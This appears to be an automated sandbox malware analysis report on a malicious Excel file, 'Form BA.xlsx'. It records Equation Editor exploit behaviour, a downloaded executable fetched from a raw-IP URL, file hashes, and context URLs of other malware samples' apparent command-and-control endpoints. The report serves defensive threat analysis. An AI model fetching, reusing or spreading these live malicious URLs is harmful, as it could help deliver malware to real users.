                                                                                                                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                                                  Analysis ID:452641
                                                                                                                                                  Start date:22.07.2021
                                                                                                                                                  Start time:17:13:46
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 11m 47s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:light
                                                                                                                                                  Sample file name:Form BA.xlsx
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:10
                                                                                                                                                  Number of new started drivers analysed:1
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal100.troj.expl.evad.winXLSX@10/19@4/3
                                                                                                                                                  EGA Information:Failed
                                                                                                                                                  HDC Information:
                                                                                                                                                  • Successful, ratio: 15.5% (good quality ratio 15%)
                                                                                                                                                  • Quality average: 75.9%
                                                                                                                                                  • Quality standard deviation: 26%
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xlsx
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer
                                                                                                                                                  Warnings:
                                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, conhost.exe, svchost.exe
                                                                                                                                                  • TCP Packets have been reduced to 100
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

Time | Type | Description
17:15:03 | API Interceptor | 40x Sleep call for process: EQNEDT32.EXE modified
17:15:04 | API Interceptor | 287x Sleep call for process: vbc.exe modified
17:15:54 | API Interceptor | 214x Sleep call for process: rundll32.exe modified

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

Match: 199.59.242.153
Associated sample (detection), followed by the context URL that sample carried:

new order.xlsx (malicious)
• www.globaltradeview.com/n84e/?YP=YB5mtasMUEHgcdBg3w1JzInb0sE5RwTjc/Tqop+T4aXdM6WeS8rV/Q3f3EZlzbjbZYjOJg==&m8ot=8pa4DPp09N0DbNR0
PO_2005042020.exe (malicious)
• www.funif.icu/dt9v/?WJBxWP=/dNyVkAccEq0OhJt4Ytz8g7S8Q6mx9qNCmyMDejIdoAPysAyB6+9naP82D/jnnZeL5y1&tFQp=7nutZ
Swift.exe (malicious)
• www.chicagolandjunkcarbuyer.com/thl4/?oTO=9XRvGPdd9OZjw66gJDqZc4Tbb4K4WVD9/14pVD3HzfT4/RgnF8iuNk1sdPo8LsHsBiNm&YTLLWz=6lgHDJPh
SWIFT MT103.exe (malicious)
• www.gor.xyz/gscc/?g2JpWVKx=45WLw/qHVVUFgrjwGZOJHGiR4I/cQSQnF8oHOeXkYfHHiqRoy/0ZD/TpSUhrjbztz6x+QlAMnQ==&i48dF=AHEdxvQpNPBdxT6p
RFQ-Order contract requirements.exe (malicious)
• www.gor.xyz/gscc/?PB6pE=45WLw/qHVVUFgrjwGZOJHGiR4I/cQSQnF8oHOeXkYfHHiqRoy/0ZD/TpSUhS8qTu9st5QlAL0g==&l4=8potZVWpGZZ
hGpEbxogJ3.msi (malicious)
• www.chicagolandjunkcarbuyer.com/thl4/?VJBxa=6l9pDXLHZLZt8&sZyTH=9XRvGPdd9OZjw66gJDqZc4Tbb4K4WVD9/14pVD3HzfT4/RgnF8iuNk1sdMIsENXUfHkh
Fra8994.exe (malicious)
• www.hitbars.space/q3t0/?_6F=+3dTbzfZs6MxWUk0s5DG9DSasbGeOcbq1TMJ6iU03rkZ0Vw53zLFflffW1vOU7AfPTuy&6l=CXf4ZT4
Statement for MCF and SSL890935672002937383920028202.exe (malicious)
• www.hullyc.com/3b4e/?qPtlS=BR-TqN&7nh=4ePaE0hXFCcoXxwZO8an49njM/FSx2KIc8Ta6ac5S7lyJ0MkFWvwf74A2m12MQKM4anz
INVOICE E-4137 REV.1 AND E-4136 REV.1.exe (malicious)
• www.cleaner-solar.com/u9pi/?4hNHZPS8=4OyfnYx74NgWtXxZ7Rjofv7BR5c/IYUL06mPXh1Fccw5xmvA4OPZgb7qUWOtnmXbMvoo&op7=ob08qfOhk
                                                                                                                                                  Img-347654566091235.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.hitbars.space/q3t0/?q6A=+3dTbzfZs6MxWUk0s5DG9DSasbGeOcbq1TMJ6iU03rkZ0Vw53zLFflffW2P0EqgnV0P1&5j=6lULKpmp0J0
                                                                                                                                                  LEMO.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.booster.guru/aipc/?f6A8Sz=BMi4rIX3OaRmAVdWmHwDy158GXvJowW6rsMkLX8T/SeurUfZZjefoMGqIKxJ2f9Kzzfm&sDKp4l=3fHXUDz8CN-
                                                                                                                                                  vbc.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.gettollingagain.com/lth/?QPi=R0ZjXo5eb12AQfL2mJSQ4Pke5FoJc2BIBKrjfE0luvFwR4nyycvvY6a4I3dzSm6JElVt&EN=z2JTn6-hWBQxkJMP
                                                                                                                                                  0m445A5H66.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.wwwmacsports.com/nff/?E6Ap=0DK8_4-Xijpdzt&fZzpL=m9tMrdH5s5McIQQpiSGs8SInYxUL4H2IAxrYgc1ZIVpX4WbHn5hGWqowwb7fTo8LB/Xn
                                                                                                                                                  sample17.exeGet hashmaliciousBrowse
                                                                                                                                                  • ww1.blm35.net/
                                                                                                                                                  444890321.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.oklahomasundayschool.com/ccr/?FJB=AxjKtjbRfNJtNPnejOfQjb3R2KRHRMY2w4U1+yq2aSZlRtrxzdj5Yr2imIB9O7nqKvHd&v0=JDK8Zp
                                                                                                                                                  2435.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.northsytyle.com/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=vA37WJpcpzFfNUYXQYg75GtNYSPqw6GeTU1J6B6lZdudLhYIKqXqgoVRncSpzE3J3g/W
                                                                                                                                                  ] New Order Vung Ang TPP Viet Nam.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.greenshirecommons.com/un8c/?8p=mBlnh5cldNPXtcmrZbSjCDRuhUw9cugXgXVTMTkNCQGRZTLNWcZvUlnJwuwR4xQFHfof&h6Z=FZOTUTGPt4-
                                                                                                                                                  fD56g4DRzG.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.frontpagesweb.net/w88t/?1bWl=DwAbJomwIIUam/8Lxif0xJyCLP0/MlDCQn/X6EWMKnqqCjXzJeuBHxh9ROI30kSy7fCE&z6z=STRxNL2x
                                                                                                                                                  malware300.docmGet hashmaliciousBrowse
                                                                                                                                                  • ww25.gokeenakte.top/admin.php?f=1&subid1=20210605-2000-3553-b2c5-4eab817b0105
                                                                                                                                                  Payment.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.digitalgamerentals.com/ngvm/?3fl00=eXBfF5JabAMvoJeV+Y5ra8EK8SdWvzGjXwXzLVFQuPc9hZ/16jkYHGAZEYy2Tm7CaklT&9rdLfJ=i48HtpdXmp

Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pool[1].exe
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: downloaded
Size (bytes): 713216
Entropy (8bit): 7.571021299706813
Encrypted: false
SSDEEP: 12288:BUEnk8yfaR+DaY3bsojKdqFyirJ5Y1oDpgAwUzl3XoJPcISRqzGWl06bsyaUVKnp:KEnkZCR+ZjKYjrw1o1H73XwPcIll/bz6
MD5: 734A568749C7879E5CA5EA2B8E082F5E
SHA1: 27D6276E49602F3633DFDD94DE400DB53E209B51
SHA-256: D0F6F28C586B78DFBC7D4E6C277C20761C9DB38E0CD059807BE5252B52D10660
SHA-512: 012E2122B51055DD011341E629890F3D7B9D3D8CE6984D62EDD287C625634C01B5FB7D220002C79D5E53EBF089FEE5C505B48FDCBE89951BEB36D0A92E9B96E0
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: low
IE Cache URL: http://3.121.113.175/www/pool.exe
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\538D84B1.jpeg
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: [TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
Category: dropped
Size (bytes): 62140
Entropy (8bit): 7.529847875703774
Encrypted: false
SSDEEP: 1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
MD5: 722C1BE1697CFCEAE7BDEFB463265578
SHA1: 7D300A2BAB951B475477FAA308E4160C67AD93A9
SHA-256: 2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
SHA-512: 2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
Malicious: false
Reputation: moderate, very likely benign file
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5CD4C46B.png
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
Category: dropped
Size (bytes): 94963
Entropy (8bit): 7.9700481154985985
Encrypted: false
SSDEEP: 1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
MD5: 17EC925977BED2836071429D7B476809
SHA1: 7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
SHA-256: 83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
SHA-512: 3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
Malicious: false
Reputation: moderate, very likely benign file
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\965742FE.png
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
Category:dropped
Size (bytes):11303
Entropy (8bit):7.909402464702408
Encrypted:false
SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
Malicious:false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9BFF9592.png
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
Category:dropped
Size (bytes):11303
Entropy (8bit):7.909402464702408
Encrypted:false
SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
Malicious:false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A3F7F095.jpeg
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
Category:dropped
Size (bytes):62140
Entropy (8bit):7.529847875703774
Encrypted:false
SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
MD5:722C1BE1697CFCEAE7BDEFB463265578
SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
Malicious:false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AB839B70.jpeg
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:dropped
Size (bytes):85020
Entropy (8bit):7.2472785111025875
Encrypted:false
SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:738BDB90A9D8929A5FB2D06775F3336F
SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B52CFCE6.emf
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
Category:dropped
Size (bytes):648132
Entropy (8bit):2.812369690502041
Encrypted:false
SSDEEP:3072:u34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:g4UcLe0JOcXuunhqcS
MD5:2051FB74D1E67A37780B94F236AFB26D
SHA1:8BA9450C0530390D27E7FDCEC790D3897730DFA4
SHA-256:643983836D160B51928239762C729C2B9D374A85B803387CE24B3C02F3C55B04
SHA-512:C1C3FF7400EAD8F1B0CD7ED7C2378974ABE971F7FA8943EA583ED9FF9E4341EE9C102E6FA9C1D9C784C26DC716944638B83781BE3E60E0A5EF8698B1FD9BA3DA
Malicious:false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C1FF01E4.jpeg
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:dropped
Size (bytes):85020
Entropy (8bit):7.2472785111025875
Encrypted:false
SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:738BDB90A9D8929A5FB2D06775F3336F
SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D2827BAF.emf
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
Category:dropped
Size (bytes):7608
Entropy (8bit):5.084398854528001
Encrypted:false
SSDEEP:96:+SFvbLSR5gs3iwiMO10VCVU7ckQadVDYM/PVfmhDqpH:5Fvw+sW31RGtdVDYM3VfmkpH
MD5:47A28CB161396FA7C67E39A74619C8CD
SHA1:B65196123279EE71D31E2C3D23B98937096F08F1
SHA-256:BB9E78C91679C8FCC51849CCED0EE7E7CE680E9249A2B074A681AAC1D7379DDC
SHA-512:99882C47315A1209104BE1C0CE49391B9AD9A04C8480297FF6E30C1D8ECEBC4EF3F3557869E685D5CA37879CA96B4F398514367AE73777AE3433C19505352797
Malicious:false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F1ED9AE7.png
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
Category:dropped
Size (bytes):94963
Entropy (8bit):7.9700481154985985
Encrypted:false
SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
MD5:17EC925977BED2836071429D7B476809
SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
Malicious:false
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso37B6.tmp
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1254
                                                                                                                                                  Entropy (8bit):5.835900066445133
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                                                                                  MD5:A3C62E516777C15BF216F12143693C61
                                                                                                                                                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                                                                                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                                                                                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso37B7.tmp
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1254
                                                                                                                                                  Entropy (8bit):5.835900066445133
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                                                                                  MD5:A3C62E516777C15BF216F12143693C61
                                                                                                                                                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                                                                                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                                                                                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso37B8.tmp
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1254
                                                                                                                                                  Entropy (8bit):5.835900066445133
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                                                                                  MD5:A3C62E516777C15BF216F12143693C61
                                                                                                                                                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                                                                                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                                                                                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoE743.tmp
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1254
                                                                                                                                                  Entropy (8bit):5.835900066445133
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                                                                                  MD5:A3C62E516777C15BF216F12143693C61
                                                                                                                                                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                                                                                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                                                                                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoE773.tmp
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1254
                                                                                                                                                  Entropy (8bit):5.835900066445133
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                                                                                  MD5:A3C62E516777C15BF216F12143693C61
                                                                                                                                                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                                                                                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                                                                                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoE774.tmp
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1254
                                                                                                                                                  Entropy (8bit):5.835900066445133
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                                                                                  MD5:A3C62E516777C15BF216F12143693C61
                                                                                                                                                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                                                                                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                                                                                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                                                                                                                  C:\Users\user\Desktop\~$Form BA.xlsx
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):330
                                                                                                                                                  Entropy (8bit):1.4377382811115937
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                  MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                  SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                  SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                  SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                  Malicious:true
